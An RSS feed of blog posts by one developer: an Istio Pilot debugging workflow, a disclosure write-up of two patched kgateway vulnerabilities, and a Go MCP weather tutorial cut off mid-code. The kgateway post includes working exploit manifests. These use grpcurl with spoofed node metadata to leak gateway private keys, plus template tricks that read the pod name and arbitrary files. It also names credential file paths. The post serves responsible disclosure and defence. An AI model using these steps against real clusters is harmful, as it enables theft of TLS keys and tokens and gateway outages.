DEV Community: Ricardo Katz The latest articles on DEV Community by Ricardo Katz (@rkatz). https://dev.to/rkatz https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2911694%2F85505c1d-eb75-4ced-b0d4-40ffde7e1877.png DEV Community: Ricardo Katz https://dev.to/rkatz en Istio Pilot - Debugging and Development workflow Ricardo Katz Tue, 06 Jan 2026 12:32:42 +0000 https://dev.to/rkatz/istio-pilot-debugging-and-development-workflow-7dc https://dev.to/rkatz/istio-pilot-debugging-and-development-workflow-7dc <p>As I've been touching more on Istio Pilot codebase recently, I've found very difficult to debug it without a DLP/debugger connected to it.</p> <p>Usually I would say "just add some fmt.Prints and spew.Sdump" around the code, but given I need to understand step by step how Istio converts some Gateway API resources into its own model, attaching a debugger became a required step.</p> <p>Additionally, the "compile/push/debug/repeat" loop became essential, so I kind of did my own workflow, that works for me.</p> <p>All of my development workflow is done using my <a href="https://gist.github.com/rikatz/a56512ad5bf4a4fe67bba024dbc1d279" rel="noopener noreferrer">Gateway API fast provisioning script</a> on kind.</p> <p><strong>Note</strong>: This is my development workflow, and may not work for you, so take with with a grain of salt ;) </p> <h2> Compile/Push repeat </h2> <p>This is my copy/paste/be happy script:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">export </span><span class="nv">TAG</span><span class="o">=</span>istio-<span class="si">$(</span><span class="nb">date</span> +%s<span class="si">)</span> <span class="nb">export </span><span class="nv">HUB</span><span class="o">=</span>localdev.tld/istio <span class="nb">export </span><span class="nv">DEBUG</span><span class="o">=</span>1 make docker.pilot <span class="o">&amp;&amp;</span> kind load docker-image <span class="k">${</span><span class="nv">HUB</span><span class="k">}</span>/pilot:<span class="k">${</span><span class="nv">TAG</span><span class="k">}</span> <span class="o">&amp;&amp;</span> kubectl <span class="nb">set </span>image <span class="nt">-n</span> istio-system deployments/istiod <span class="nv">discovery</span><span class="o">=</span><span class="k">${</span><span class="nv">HUB</span><span class="k">}</span>/pilot:<span class="k">${</span><span class="nv">TAG</span><span class="k">}</span> </code></pre> </div> <h2> Remote debugging </h2> <p>First, why remote debugging? I wanted to check exactly what's going on my live code. I didn't wanted to run it locally.</p> <p>I will update this article with a better approach, but for now:</p> <ul> <li>Create and apply a patch on Dockerfile.pilot <strong>AND REMEMBER TO NOT COMMIT IT!</strong> </li> </ul> <p>This <a href="https://gist.githubusercontent.com/rikatz/f5a07945038f705c9d10625eceb99932/raw/c56c9f0fca2545fffbe87d4de55ccb5d474f173b/dockerfile.patch" rel="noopener noreferrer">patch</a> gets <code>delve</code> from the Go official images, and copy to the final Istio image. It also changes the entrypoint to be delve starting pilot.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-o</span> dockerfile.patch https://gist.githubusercontent.com/rikatz/f5a07945038f705c9d10625eceb99932/raw/c56c9f0fca2545fffbe87d4de55ccb5d474f173b/dockerfile.patch git apply dockerfile.patch </code></pre> </div> <p><strong>Note</strong>: right now bumping the used go image should be done manually .</p> <ul> <li>Change your Pilot deployment to allow writing to filesystem and to add SYS_PTRACE capability</li> </ul> <p>These changes are required for Delve to work properly<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> kubectl patch deployment istiod <span class="nt">-n</span> istio-system <span class="nt">--type</span><span class="o">=</span><span class="s1">'json'</span> <span class="nt">-p</span><span class="o">=</span><span class="s1">'[ {"op": "replace", "path": "/spec/template/spec/containers/0/securityContext/allowPrivilegeEscalation", "value": true}, {"op": "replace", "path": "/spec/template/spec/containers/0/securityContext/readOnlyRootFilesystem", "value": false}, {"op": "add", "path": "/spec/template/spec/containers/0/securityContext/capabilities", "value": {"add": ["SYS_PTRACE"]}} ]'</span> </code></pre> </div> <ul> <li>Do a port-forward to delve port</li> </ul> <p>This is the port where you will connect your remote-debugger later (on localhost:40000):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>kubectl port-forward -n istio-system deploy/istiod 40000 </code></pre> </div> <ul> <li>Attach to remote process Here is my vscode file: </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0.2.0"</span><span class="p">,</span><span class="w"> </span><span class="nl">"configurations"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Remote Debug Pilot in K8s"</span><span class="p">,</span><span class="w"> </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"go"</span><span class="p">,</span><span class="w"> </span><span class="nl">"request"</span><span class="p">:</span><span class="w"> </span><span class="s2">"attach"</span><span class="p">,</span><span class="w"> </span><span class="nl">"mode"</span><span class="p">:</span><span class="w"> </span><span class="s2">"remote"</span><span class="p">,</span><span class="w"> </span><span class="nl">"remotePath"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"> </span><span class="nl">"port"</span><span class="p">:</span><span class="w"> </span><span class="mi">40000</span><span class="p">,</span><span class="w"> </span><span class="nl">"host"</span><span class="p">:</span><span class="w"> </span><span class="s2">"localhost"</span><span class="p">,</span><span class="w"> </span><span class="nl">"showLog"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w"> </span><span class="nl">"trace"</span><span class="p">:</span><span class="w"> </span><span class="s2">"verbose"</span><span class="p">,</span><span class="w"> </span><span class="nl">"substitutePath"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"from"</span><span class="p">:</span><span class="w"> </span><span class="s2">"${workspaceFolder}"</span><span class="p">,</span><span class="w"> </span><span class="nl">"to"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/work"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h2> Running integration tests </h2> <p>Finally, this is my last step. Once I am writing some integration tests, I may want to run them locally before posting my PR. Here is usually how I do:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>INTEGRATION_TEST_FLAGS="-run ^TestGatewayAPIResourcesOnly$" ./prow/integ-suite-kind.sh --topology MULTICLUSTER --skip-cleanup test.integration.pilot.resourcefilter.kube </code></pre> </div> <p>This one runs a single integration test called <code>TestGatewayAPIResourcesOnly</code>. The topology flag is optional and can be used if a specific topology integration test is failing. </p> <p>The final name <code>test.integration.pilot.resourcefilter.kube</code> can be translated to "tests/integration/pilot/somesubfolder".</p> <p>So, in case you want to run a test that is directly on "tests/integration/pilot" you can replace it for <code>test.integration.pilot.kube</code>.</p> istio kubernetes gatewayapi go The kgateway vulnerabilities explained (and why I disagree on its score!) Ricardo Katz Thu, 06 Nov 2025 17:30:00 +0000 https://dev.to/rkatz/the-kgateway-vulnerabilities-explained-and-why-i-disagree-on-its-score-339e https://dev.to/rkatz/the-kgateway-vulnerabilities-explained-and-why-i-disagree-on-its-score-339e <p><strong>NOTE</strong> ⚠️: This article is written purely for research and educational purposes to help improve security across the ecosystem, and represents my self-evaluation of our risk assessment process for kgateway. kgateway is an excellent Gateway API implementation, and I have great respect for the developers and their work on this project. The vulnerabilities discussed here have been responsibly disclosed and patched. Views expressed are my own and do not necessarily reflect those of my employer.</p> <h2> Table of Contents </h2> <ul> <li>Acknowledgments</li> <li> Some context <ul> <li>Why Envoy-based Implementations?</li> </ul> </li> <li> The weak authentication problem <ul> <li>Getting the Pod name</li> <li>About the score of this vulnerability</li> </ul> </li> <li> The arbitrary file read problem <ul> <li>About the score of this vulnerability</li> </ul> </li> <li>Best Practices for Security</li> </ul> <h2> Acknowledgments </h2> <p>Starting with acknowledgments:</p> <ul> <li>My wife, who was very patient with me while I was spending a lot of time investigating this</li> <li>My team, who gave me time to conduct this research and kept motivating me to help improve the open source ecosystem</li> <li>My friends Carlos, Adolfo and James</li> <li>Ingress NGINX maintainers (past, current) - I know those are hard times, but you rock and have maintained a critical piece for some long time</li> <li>kgateway maintainers (especially John and Josh) who took some time to understand the problem, acknowledge and fix it.</li> </ul> <h2> Some context </h2> <p>I recently discovered 2 vulnerabilities in <a href="https://kgateway.dev" rel="noopener noreferrer">kgateway</a> that have been publicly disclosed: </p> <ul> <li> <a href="https://github.com/kgateway-dev/kgateway/security/advisories/GHSA-5pmx-7r6r-wfqq" rel="noopener noreferrer">GHSA-5pmx-7r6r-wfqq</a> - Users can read any file from the proxy container</li> <li> <a href="https://github.com/kgateway-dev/kgateway/security/advisories/GHSA-4766-x535-jw3r" rel="noopener noreferrer">GHSA-4766-x535-jw3r / CVE-2025-64323</a> - Weak authentication between dataplane and control plane</li> </ul> <p>These findings were discovered unintentionally, while I was researching how to extend and use kgateway for a personal idea. </p> <p>For those unfamiliar, kgateway is a CNCF incubated project that implements a Kubernetes <a href="https://gateway-api.sigs.k8s.io/" rel="noopener noreferrer">Gateway API</a> controller, and is one of many implementations backed by <a href="https://www.envoyproxy.io/" rel="noopener noreferrer">Envoy Proxy</a>. </p> <p>Additionally, the project is leaning towards supporting its own proxy implementation called <a href="https://agentgateway.dev/" rel="noopener noreferrer">agentgateway</a>, more focused on AI traffic and implemented in Rust. </p> <h3> Why Envoy-based Implementations? </h3> <p>One of the most appealing features of Envoy is its capability of dynamic configuration based on a <a href="https://www.envoyproxy.io/docs/envoy/v1.36.2/start/quick-start/configuration-dynamic-control-plane" rel="noopener noreferrer">Control Plane/Data plane architecture</a>.</p> <p>This architecture allows a single controller to reconcile all Gateway API resources and generate a configuration that is exposed on a network endpoint via Envoy's <a href="https://www.envoyproxy.io/docs/envoy/latest/intro/arch_overview/operations/dynamic_configuration" rel="noopener noreferrer">well-known API</a> using a Go library provided by Envoy. An Envoy proxy can then connect to this control plane endpoint and fetch its own configuration.</p> <p>This makes it much easier for implementations to separate the concerns between the control plane, that will connect to a Kubernetes cluster to watch and reconcile resources, and the dataplane, that should never have direct access to Kubernetes API server, and also helps avoiding problems we had in the past with Ingress NGINX and its nginx.conf generation based on templates.</p> <p>An <strong>example</strong> scenario of Gateway API deployment with Envoy-based implementations is shown below, where the controller is in one namespace, a Gateway is created in an infrastructure namespace, and the user application is in a different namespace.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa0xcj9ymur4ep2d8kpem.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa0xcj9ymur4ep2d8kpem.png" alt=" "></a></p> <h2> The weak authentication problem </h2> <p>This is related to <a href="https://github.com/kgateway-dev/kgateway/security/advisories/GHSA-4766-x535-jw3r" rel="noopener noreferrer">GHSA-4766-x535-jw3r / CVE-2025-64323</a></p> <p>During my research, one of my goals was to attach my own proxy to kgateway, to see if I could rely on its reconciliation logic while using a custom backend. This is actually <a href="https://kgateway.dev/docs/latest/setup/selfmanaged/" rel="noopener noreferrer">supported</a>.</p> <p>I realized that the kgateway control plane was exposed to proxies via the <code>kgateway</code> service in the <code>kgateway-system</code> namespace, on port <code>9977</code>.</p> <p>My starting point was to figure out if I could use <a href="https://github.com/fullstorydev/grpcurl" rel="noopener noreferrer">grpcurl</a> to fetch the configuration directly from the kgateway control plane. After consulting ChatGPT for the correct syntax, I arrived at something like this (note: the command is incomplete):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>grpcurl -plaintext kgateway.kgateway-system:9977 \ envoy.service.discovery.v3.AggregatedDiscoveryService/StreamAggregatedResources </code></pre> </div> <p>This <a href="https://www.envoyproxy.io/docs/envoy/latest/configuration/overview/xds_api#aggregated-discovery-service" rel="noopener noreferrer">service</a> can be used to stream configurations to Envoy, but you need to specify which type you want (Listener? Routes?). </p> <p>Also, an Envoy proxy needs to pass to the control plane what are its metadata, so the control plane can decide which configuration to send. kgateway used this metadata as an authentication mechanism.</p> <p><strong>Note</strong>: agentgateway used a similar way to get its configuration from kgateway control plane. The main difference is that agentgateway relies on a much smaller model.</p> <p>After some investigation, I discovered that by passing the right data, the control plane would return the requested configuration:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"node"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"$GATEWAY_POD.$GATEWAY_NAMESPACE"</span><span class="p">,</span><span class="w"> </span><span class="nl">"cluster"</span><span class="p">:</span><span class="w"> </span><span class="s2">"$GATEWAY_NAME.$GATEWAY_NAMESPACE"</span><span class="p">,</span><span class="w"> </span><span class="nl">"metadata"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"role"</span><span class="p">:</span><span class="w"> </span><span class="s2">"kgateway-kube-gateway-api~$GATEWAY_NAMESPACE~$GATEWAY_NAME"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"typeUrl"</span><span class="p">:</span><span class="w"> </span><span class="s2">"$ENVOY_TYPE"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>The request requires these replacements:</p> <ul> <li> <code>$GATEWAY_NAME</code> and <code>$GATEWAY_NAMESPACE</code> are the Gateway resource details. Users with permission to create an HTTPRoute would already have this information (required for the <code>parentRef</code> field)</li> <li> <code>$GATEWAY_POD</code> is the actual pod name of the Envoy proxy. This is the only piece of information that might be challenging to obtain, which led to discovering the other vulnerability</li> <li> <code>$ENVOY_TYPE</code> is the type of configuration to stream. Common types include: </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>type.googleapis.com/envoy.config.listener.v3.Listener #&lt;- This contains certificates! type.googleapis.com/envoy.config.route.v3.RouteConfiguration type.googleapis.com/envoy.config.cluster.v3.Cluster type.googleapis.com/envoy.config.endpoint.v3.ClusterLoadAssignment type.googleapis.com/envoy.extensions.transport_sockets.tls.v3.Secret type.googleapis.com/envoy.config.listener.v3.FilterChain </code></pre> </div> <p>Since the only additional information needed for authentication is the <code>Gateway Pod name</code>, once obtained, an attacker can create a Pod/Job with the manifest below to expose gateway certificates (which they should not have access to, as certificates are managed by the Gateway owner). In this example, I've replaced GATEWAY_NAME, GATEWAY_NAMESPACE, GATEWAY_POD, and ENVOY_TYPE with the appropriate values:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">batch/v1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">Job</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">leak</span> <span class="na">namespace</span><span class="pi">:</span> <span class="s">unprivileged</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">backoffLimit</span><span class="pi">:</span> <span class="m">0</span> <span class="na">template</span><span class="pi">:</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">restartPolicy</span><span class="pi">:</span> <span class="s">Never</span> <span class="na">containers</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">grpcurl-runner</span> <span class="na">image</span><span class="pi">:</span> <span class="s">mirror.gcr.io/fedora:43</span> <span class="na">command</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">/bin/bash"</span><span class="pi">,</span> <span class="s2">"</span><span class="s">-c"</span><span class="pi">]</span> <span class="na">args</span><span class="pi">:</span> <span class="pi">-</span> <span class="pi">|</span> <span class="s">set -e</span> <span class="s">rpm -Uvh https://github.com/fullstorydev/grpcurl/releases/download/v1.9.3/grpcurl_1.9.3_linux_amd64.rpm</span> <span class="s">cat &gt; /script.sh &lt;&lt;'EOF'</span> <span class="s">#!/bin/bash</span> <span class="s">until [ -s /output.txt ]; do</span> <span class="s">sleep 1</span> <span class="s">grpcurl -plaintext -d '{"node": {"id": "gateway-678d4cf544-h9bs2.infra","cluster": "gateway.infra","metadata": {"role": "kgateway-kube-gateway-api~infra~gateway"}},"typeUrl": "type.googleapis.com/envoy.config.listener.v3.Listener"}' kgateway.kgateway-system:9977 envoy.service.discovery.v3.AggregatedDiscoveryService/StreamAggregatedResources &gt; /output.txt</span> <span class="s">done</span> <span class="s">cat /output.txt</span> <span class="s">EOF</span> <span class="s">chmod +x /script.sh</span> <span class="s">/script.sh</span> </code></pre> </div> <p>And checking the logs of this Job:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>"privateKey": { "inlineBytes": "CERTIFICATE_PRIVATE_KEY" } </code></pre> </div> <h3> Getting the Pod name </h3> <p>Discovering the Pod name was required to be able to authenticate. kgateway contains a Custom Resource called <a href="https://kgateway.dev/docs/latest/reference/api/#trafficpolicy" rel="noopener noreferrer">TrafficPolicy</a> that allows a user to apply policies like rate limit, authentication, etc. </p> <p>The problem with TrafficPolicy is that it allows some transformations to add headers to requests and responses, and these transformations can be based on templates, but also allow reading the Proxy environment variables.</p> <p>This feature can be legitimately used to expose variables related to availability zones of a proxy, but it can also be used to read environment variables that contain the HOSTNAME, which is the Pod name. </p> <p>For example, a user could create the following resources in their unprivileged namespace:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io/v1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">HTTPRoute</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">my-app</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">hostnames</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">app.tld</span> <span class="na">parentRefs</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">group</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">Gateway</span> <span class="na">name</span><span class="pi">:</span> <span class="s">gateway</span> <span class="na">namespace</span><span class="pi">:</span> <span class="s">infra</span> <span class="na">rules</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">backendRefs</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">group</span><span class="pi">:</span> <span class="s2">"</span><span class="s">"</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">Service</span> <span class="na">name</span><span class="pi">:</span> <span class="s">my-app</span> <span class="na">port</span><span class="pi">:</span> <span class="m">80</span> <span class="na">weight</span><span class="pi">:</span> <span class="m">1</span> <span class="na">matches</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">path</span><span class="pi">:</span> <span class="na">type</span><span class="pi">:</span> <span class="s">PathPrefix</span> <span class="na">value</span><span class="pi">:</span> <span class="s">/</span> <span class="nn">---</span> <span class="na">apiVersion</span><span class="pi">:</span> <span class="s">gateway.kgateway.dev/v1alpha1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">TrafficPolicy</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">transformation</span> <span class="na">namespace</span><span class="pi">:</span> <span class="s">unprivileged</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">targetRefs</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">group</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">HTTPRoute</span> <span class="na">name</span><span class="pi">:</span> <span class="s">my-app</span> <span class="na">transformation</span><span class="pi">:</span> <span class="na">response</span><span class="pi">:</span> <span class="na">add</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">pod-name</span> <span class="na">value</span><span class="pi">:</span> <span class="s1">'</span><span class="s">{{</span><span class="nv"> </span><span class="s">env("HOSTNAME")</span><span class="nv"> </span><span class="s">}}'</span> </code></pre> </div> <p>A simple cURL request to the app is sufficient to retrieve the Gateway pod name:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ curl --output /dev/null -I -s -w '%header{pod-name}' http://app.tld gateway-678d4cf544-h9bs2 </code></pre> </div> <p>The pod name can then be used to exploit the weak authentication vulnerability.</p> <h3> About the score of this vulnerability </h3> <p>Given that:</p> <ul> <li>The vulnerability requires authenticated Kubernetes cluster access with permissions to create HTTPRoute and TrafficPolicy resources, meaning <code>Network Attack Vector (AV:N)</code> and <code>Low Privileges required (PR:L)</code> </li> <li>The <code>Attack complexity is low (AC:L)</code> </li> <li>The <code>Confidentiality impact is high (C:H)</code> </li> </ul> <p>Based on these factors, the CVSS score for this vulnerability is <a href="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N&amp;version=3.1" rel="noopener noreferrer">6.5</a>, which classifies it as "Medium" severity.</p> <p><strong>Note</strong>: While access to TrafficPolicy and HTTPRoute should be restricted through proper RBAC policies, the low barrier to exploitation for users with these permissions remains a significant security concern.</p> <h2> The arbitrary file read problem </h2> <p>This is related to <a href="https://github.com/kgateway-dev/kgateway/security/advisories/GHSA-5pmx-7r6r-wfqq" rel="noopener noreferrer">GHSA-5pmx-7r6r-wfqq</a></p> <p>While trying to figure out a way to expose the Pod name, I noticed that the kgateway documentation states that <a href="https://kgateway.dev/docs/latest/traffic-management/transformations/templating-language/#inja" rel="noopener noreferrer">"templates are powered by v3.4 of the Inja template engine"</a>. </p> <p>I decided to investigate what other capabilities <a href="https://github.com/pantor/inja" rel="noopener noreferrer">Inja</a> offered.</p> <p>Inja allows including other files as templates, so I decided to test this feature by modifying my TrafficPolicy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">gateway.kgateway.dev/v1alpha1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">TrafficPolicy</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">transformation</span> <span class="na">namespace</span><span class="pi">:</span> <span class="s">unprivileged</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">targetRefs</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">group</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">HTTPRoute</span> <span class="na">name</span><span class="pi">:</span> <span class="s">my-app</span> <span class="na">transformation</span><span class="pi">:</span> <span class="na">response</span><span class="pi">:</span> <span class="na">body</span><span class="pi">:</span> <span class="na">parseAs</span><span class="pi">:</span> <span class="s">AsString</span> <span class="na">value</span><span class="pi">:</span> <span class="s1">'</span><span class="s">{%</span><span class="nv"> </span><span class="s">include</span><span class="nv"> </span><span class="s">"/etc/envoy/envoy.yaml"</span><span class="nv"> </span><span class="s">%}'</span> </code></pre> </div> <p>And now, when I call my app with <code>curl http://app.tld</code> I get the full envoy configuration.</p> <p>At first, someone might think to extract the Kubernetes service account from <code>/var/run/secrets/kubernetes.io/serviceaccount/token</code>, but kgateway implements good security practices by <strong>not mounting Kubernetes service account tokens on the proxies</strong>.</p> <p>However, an attacker could still read <code>/proc/1/cmdline</code> to see how Envoy is started and potentially obtain credentials for the control plane.</p> <p>The authentication for the <strong>Weak Authentication issue</strong> was added as part of this <a href="https://github.com/kgateway-dev/kgateway/pull/12471" rel="noopener noreferrer">PR</a> and now we can see that this new token is mounted at <code>/var/run/secrets/tokens/xds-token</code>.</p> <p>Since these are two separate vulnerabilities, if the file injection issue had been discovered after the weak authentication fix was deployed, an attacker could still read the authentication token and fetch configurations from the control plane.</p> <p>Another concern is that an attacker could set the include path to <code>/dev/stdout</code>, which blocks all Envoy reads and makes the Gateway unavailable, creating both a confidentiality and availability issue.</p> <h3> About the score of this vulnerability </h3> <p>Given that:</p> <ul> <li>The vulnerability requires authenticated Kubernetes cluster access with permissions to create HTTPRoute and TrafficPolicy resources, meaning <code>Network Attack Vector (AV:N)</code> and <code>Low Privileges required (PR:L)</code> </li> <li>The <code>Attack complexity is low (AC:L)</code> </li> <li>The <code>Confidentiality impact is high (C:H)</code> </li> <li>The <code>Availability impact is high (A:H)</code> </li> </ul> <p>Based on these factors, the CVSS score for this vulnerability is <a href="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H&amp;version=3.1" rel="noopener noreferrer">8.1</a>, which classifies it as "High" severity.</p> <h2> Best Practices for Security </h2> <p>Recommended steps to help reduce the risks of discovered (and undiscovered) vulnerabilities:</p> <ul> <li> <strong>Always upgrade</strong> - Apply security updates regardless of whether vulnerabilities are tagged as "Low" or "Medium".</li> <li> <strong>Implement least privilege</strong> - Limit user access to only the resources they need. If users don't require access to resources like <code>TrafficPolicy</code>, don't grant it. If they do, ensure proper auditing is in place.</li> <li> <strong>Use Network Policies</strong> - While kgateway manages part of the Gateway lifecycle, you can still create <a href="https://kubernetes.io/docs/concepts/services-networking/network-policies/" rel="noopener noreferrer">NetworkPolicies</a> to restrict control plane access to only Gateways in trusted namespaces.</li> </ul> kubernetes kgateway security gatewayapi Experimenting mcp-go, AnythingLLM and local LLM executions Ricardo Katz Mon, 21 Apr 2025 20:28:57 +0000 https://dev.to/rkatz/experimenting-mcp-go-anythingllm-and-local-llm-executions-549a https://dev.to/rkatz/experimenting-mcp-go-anythingllm-and-local-llm-executions-549a <p>This post was originally created <a href="https://www.rkatz.xyz/post/2025-04-21-mcp-local-go/" rel="noopener noreferrer">here</a></p> <p><strong>NOTE</strong>: I am no LLM, AI or whatever expert. Far from this. I have decided to write this blog post mostly as a way to track my progress and share my findings! There may be some mistakes here, please let me know!</p> <p>I got hyped into the <a href="https://modelcontextprotocol.io/" rel="noopener noreferrer">MCP</a> trend. Usually I wait a bit more to get engaged into these subjects, but when it comes to cool integration between tools, I get excited to experiment fast.</p> <p>MCP, as a single line explanation (from my own head) is "a way to integrate local data with LLM". Mostly it allows me to connect some LLM that understands a question like "what's the current weather in Sao Paulo", providing an interface that receives a formatted query, requests informations from some API (but can also be a full local execution, like listing my filesystem) and provides a structured response to LLM back so it can be formatted.</p> <p>It is, as its name says, a protocol that allows a developer to create an "API'ish", queried in real time and providing answers based on the API response.</p> <p>I have decided to use <a href="https://github.com/mark3labs/mcp-go/" rel="noopener noreferrer">Golang SDK</a> as it is my comfort zone, but the MCP site has a bunch of useful examples using whatever language you feel more comfortable with (and it also has its official SDKs in Python, NodeJS, etc).</p> <p>Because I don't have enough money to spend calling Claude (Anthropic, the original creator of MCP is also the company behind Claude), I have decided to use the very cool project called <a href="https://anythingllm.com/" rel="noopener noreferrer">AnythingLLM</a> that allows me to execute local models and also supports MCP.</p> <p>The code used here is also available at <a href="https://github.com/rikatz/weather-mcp-go" rel="noopener noreferrer">Github</a></p> <h2> Concepts </h2> <p>Some concepts used here:</p> <ul> <li>MCP Server - AKA Agent AI - What we are implementing here. A "server" that will be called to provide responses</li> <li>MCP Client - A client that "knows" how to call a MCP server. In our case is AnythingLLM</li> <li>Resources - Our API responses, but can be local files, etc. Consumed by MCP Server, provided as response to MCP Client</li> <li>Tools - the "methods" that can be called by MCP Client. In our case you are going to see it as the <code>getForecast()</code> function</li> </ul> <h2> Pre requisites </h2> <p>I will not cover how to install every piece, it should be straightforward. What you need is to install <a href="https://anythingllm.com/" rel="noopener noreferrer">AnythingLLM</a> and load a model. I am using Llama 3.2 3B, but if you need more complex operations, AnythingLLM allows you to select different models to execute locally.</p> <p>The API used in this example is based on already existing example <br> <a href="https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-python" rel="noopener noreferrer">Weather MCP</a> but mostly converted to Go. We cover just the forecast API, and not the Alerts one, but go<br> ahead and try implementing your own :) it is fun!</p> <p>The API definition is also available <a href="https://www.weather.gov/documentation/services-web-api" rel="noopener noreferrer">here</a></p> <h2> Getting started </h2> <p>First, we need to create a Go project with MCP Go library:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>go mod init weather-go go get github.com/mark3labs/mcp-go </code></pre> </div> <h3> Defining the API responses </h3> <p>The forecast API makes its responses as JSON. To make our life easier, only the parts we care from this API were extracted, so the definition looks like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="c">// WeatherPoints contains the response for API/points/latitude,longitude</span> <span class="c">// we care just about the Forecast field, that contains the new API URL that should be called</span> <span class="k">type</span> <span class="n">WeatherPoints</span> <span class="k">struct</span> <span class="p">{</span> <span class="n">Properties</span> <span class="k">struct</span> <span class="p">{</span> <span class="n">Forecast</span> <span class="kt">string</span> <span class="s">`json:"forecast"`</span> <span class="p">}</span> <span class="s">`json:"properties"`</span> <span class="p">}</span> <span class="c">// Forecast contains the forecast prediction for a lat,long. </span> <span class="c">// example: https://api.weather.gov/gridpoints/MTR/85,105/forecast</span> <span class="k">type</span> <span class="n">Forecast</span> <span class="k">struct</span> <span class="p">{</span> <span class="n">Properties</span> <span class="k">struct</span> <span class="p">{</span> <span class="n">Periods</span> <span class="p">[]</span><span class="k">struct</span> <span class="p">{</span> <span class="n">Name</span> <span class="kt">string</span> <span class="s">`json:"name,omitempty"`</span> <span class="n">Temperature</span> <span class="kt">int</span> <span class="s">`json:"temperature,omitempty"`</span> <span 